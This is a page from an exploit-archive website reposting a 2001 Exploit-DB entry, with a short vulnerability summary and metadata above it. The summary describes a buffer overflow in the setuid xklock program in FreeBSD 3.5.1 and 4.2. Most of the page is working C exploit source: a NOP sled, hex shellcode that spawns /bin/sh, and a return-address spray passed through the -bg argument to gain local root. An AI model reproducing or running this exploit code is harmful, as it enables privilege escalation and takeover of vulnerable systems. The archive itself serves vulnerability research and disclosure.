Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
xklock - FreeBSD 3.5.1 & 4.2 ports package local root exploit - exploit.company
header-logo
Suggest Exploit
vendor:
xklock
by:
dethy
7.5
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: xklock
Affected Version From: FreeBSD 3.5.1
Affected Version To: FreeBSD 4.2
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: FreeBSD
2001

xklock – FreeBSD 3.5.1 & 4.2 ports package local root exploit

The xklock program in FreeBSD 3.5.1 and 4.2 ports package contains several exploitable buffer overflows in command line arguments as well as the 'JNAME' environment variable. This exploit abuses the -bg argument.

Mitigation:

Update to a patched version of xklock or remove the setuid root permission from the program.
Source

Exploit-DB raw data:

/*
 * xklock - FreeBSD 3.5.1 & 4.2 ports package local root exploit
 * 
 * The X key lock program contain several exploitable buffer overflows
 * in command line arguments aswell as the 'JNAME' environment variable.
 * xklock is installed setuid root by default.
 * This POC exploit (ab)uses the -bg arg, brute force offset if required.
 *
 * Usage: ./exklock <offset>
 *
 * dethy@synnergy.net // www.synnergy.net
 * 20 Feb 2001.
 *
 */ 

#include <stdio.h>
#include <stdlib.h>

#define EGGSIZE 1024
#define RETSIZE 264
#define NOP 0x90
#define OFFSET 0

char shellcode[]= // execve() freebsd x86
	"\xeb\x37\x5e\x31\xc0\x88\x46\xfa\x89\x46\xf5\x89\x36\x89\x76"
	"\x04\x89\x76\x08\x83\x06\x10\x83\x46\x04\x18\x83\x46\x08\x1b"
	"\x89\x46\x0c\x88\x46\x17\x88\x46\x1a\x88\x46\x1d\x50\x56\xff"
	"\x36\xb0\x3b\x50\x90\x9a\x01\x01\x01\x01\x07\x07\xe8\xc4\xff"
	"\xff\xff\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02"
	"\x02\x02\x02/bin/sh.-c.sh";


u_long get_sp(void) { __asm__("movl %esp,%eax"); }

int main(int argc, char *argv[]) {
 char egg[EGGSIZE], ret[RETSIZE];
 int i, eggsize = EGGSIZE, retsize = RETSIZE, nop = NOP, offset=OFFSET;
 long *address;
  
 if(argc > 1){ offset = atoi(argv[1]); }
 (char *)address = get_sp - offset;
 fprintf(stderr, "Using addr: 0x%x\n", address);

 memset(egg, nop, eggsize);
 memcpy(egg+(eggsize - strlen(shellcode) - 1), shellcode, strlen(shellcode));
 for(i=0; i < retsize; i+=4) *(int *)&ret[i]=address;

 if(execle("/usr/local/bin/xklock", egg, "-bg", ret, NULL, NULL)) {
  fprintf(stderr,"Unable to execute /usr/local/bin/xklock\n");
  exit(1);
 }
}


// milw0rm.com [2001-03-03]

Navigation

Suggest Exploit

Services By CQR